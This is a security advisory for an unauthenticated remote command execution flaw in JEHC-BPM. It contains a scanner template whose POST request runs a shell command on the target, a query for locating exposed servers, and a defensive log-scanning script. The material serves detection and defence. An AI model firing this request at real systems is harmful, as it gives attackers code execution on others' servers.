A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
PoC code [public]
id: CVE-2025-45854

info:
  name: JEHC-BPM - Remote Code Execute
  author: ritikchaddha
  severity: critical
  description: |
    A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
  reference:
    - https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
    - https://nvd.nist.gov/vuln/detail/CVE-2025-45854
  classification:
    epss-score: 0.10795
    epss-percentile: 0.93081
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-45854
    cwe-id: CWE-862,CWE-434
  metadata:
    max-request: 1
    product: jehc-bpm
    fofa-query: body="JEHC"
  tags: cve,cve2025,jehc-bpm,rce

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "JEHC"
          - "XSHI"
        case-insensitive: true
        internal: true

  - raw:
      - |
        POST /server/executeExec HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {
          "actuator": {
            "clientIp": "127.0.0.1",
            "port": 8082,
            "applicationName": "testApp",
            "env": "prod",
            "uploadTime": 1704523200000,
            "hasPrefixApplicationName": false,
            "clientHttpPrefix": "http"
          },
          "execParams": {
            "command": "id"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220680c3e3415dd179d97880e097546af918c26a04d7f0b118910c8fc2dbba610ac0221008a48a7535924ee910ff01f637eaa0bb9d36435e069357b852e388f2eab94c925:922c64590222798bb761d5b6d8e72950
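
To check whether the endpoint described above has been requested on your own deployment, the following added example (not part of the advisory or the template) scans reverse-proxy access logs for `/server/executeExec`. It assumes NCSA combined log format and that the application may sit under a context path; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

TARGET = "/server/executeexec"  # endpoint named in the advisory, lower-cased
# Assumed log format: NCSA combined (the nginx/Apache default).
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalize_path(target):
    """Canonicalize a request target so equivalent spellings compare equal."""
    path = re.sub(r"^[a-z][a-z0-9+.-]*://[^/]*", "", target, flags=re.I)
    path = path.split("?", 1)[0].split("#", 1)[0]
    for _ in range(2):                      # undo single and double percent-encoding
        path = unquote(path)
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]          # drop ";param" matrix parameters
        if seg == "..":
            del out[-1:]                    # step up one level, if there is one
        elif seg not in ("", "."):          # "" and "." come from "//" and "/./"
            out.append(seg)
    return "/" + "/".join(out).lower()

def find_hits(lines):
    """Map source IP -> [(time, method, status, raw target)] for the endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        # endswith() also covers deployments under a context path (assumption).
        if m and normalize_path(m["target"]).endswith(TARGET):
            hits[m["ip"]].append((m["time"], m["method"], int(m["status"]), m["target"]))
    return dict(hits)

def answered_ok(hits):
    """IPs that received a 2xx from the endpoint: review these requests first."""
    return sorted(ip for ip, rows in hits.items()
                  if any(200 <= r[2] < 300 for r in rows))

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jun/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [01/Jun/2025:10:00:02 +0000] "POST /server/executeExec HTTP/1.1" 200 64 "-" "-"',
    '198.51.100.7 - - [01/Jun/2025:10:05:00 +0000] "POST /jehc//server/./execute%45xec;x=1?a=b HTTP/1.1" 403 0 "-" "-"',
    '203.0.113.5 - - [01/Jun/2025:10:06:00 +0000] "GET /server/list HTTP/1.1" 200 900 "-" "-"',
]
if __name__ == "__main__":
    print("2xx from endpoint:", answered_ok(find_hits(SAMPLE)))
```

A 2xx status only shows that the endpoint answered the request, so follow up on the host for any source listed by `answered_ok`.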